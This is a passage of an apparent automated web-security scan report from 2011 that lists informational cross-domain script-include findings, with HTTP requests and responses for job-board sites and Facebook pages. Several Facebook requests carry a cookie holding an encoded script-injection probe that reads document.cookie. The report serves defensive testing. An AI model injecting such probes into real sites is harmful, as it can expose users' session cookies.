<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.330. http://www.engineeringcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.engineeringcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.engineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:03 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u76d1au7ldsubj9jq17ge4lui3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:03 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 136413

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.331. http://www.entrylevelcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.entrylevelcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.entrylevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:04 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u5gd5nbnop8c3jphrctn63t6f2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:04 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:04 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 149370

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.332. http://www.environmentalcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.environmentalcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.environmentalcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:07 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=dq6vrirkde3igauguqgj7gjfh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:07 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:07 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103899

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.333. http://www.environmentalsafetyhealthcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.environmentalsafetyhealthcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.environmentalsafetyhealthcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:13 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kinch90afsop9ot95vej0stu73; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109299

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.334. http://www.ericmmartin.com/projects/simplemodal/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:09:51 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Fri, 21 Jan 2011 20:01:28 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 34881


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<link rel='stylesheet' id='emm-v3-css' href='http://www.ericmmartin.com/wordpress/wp-content/themes/emm-v3/style.css?ver=1.0.16' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=1.4.3'></script>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js?pub=emartin24&#038;ver=3.0.2'></script>
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201103.js" type="text/javascript"></script>
...[SNIP]...

15.335. http://www.erpcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.erpcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.erpcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:16 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=f4lggi6e8n8h982dg6rfsp1522; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:16 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:16 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116111

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.336. http://www.execcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.execcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.execcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:21 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=sedi04t58r2ut89pg242blpvl1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:21 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:21 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130348

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.337. http://www.facebook.com/BMWUSA

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BMWUSA

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /BMWUSA HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=85x21; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=EvrQb; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 19:51:54 GMT
Content-Length: 37193

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

15.338. http://www.facebook.com/EmploymentXing

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /EmploymentXing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /EmploymentXing HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=Z_NLA; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FEmploymentXing; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:38 GMT
Content-Length: 21078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

15.339. http://www.facebook.com/pages/JD2B/298408284363

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/JD2B/298408284363

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pages/JD2B/298408284363 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=jal5o; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:30 GMT
Content-Length: 56415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

15.340. http://www.facebook.com/piyush.v.bhatt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /piyush.v.bhatt

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /piyush.v.bhatt HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=557x557; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djd2b.com%26placement%3Dlike_box%26extra_1%3Dhttp%253A%252F%252Fwww.jd2b.com%252F%253Ff05bd%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253Ecf651820abc%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=WABbM; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpiyush.v.bhatt; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 22:26:40 GMT
Content-Length: 20984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

15.341. http://www.facebook.com/plugins/like.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/like.php?href=http%3A%2F%2Fweekendedition.news.yahoo.com&layout=button_count&show_faces=false&width=85&action=like&colorscheme=light&height=21 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
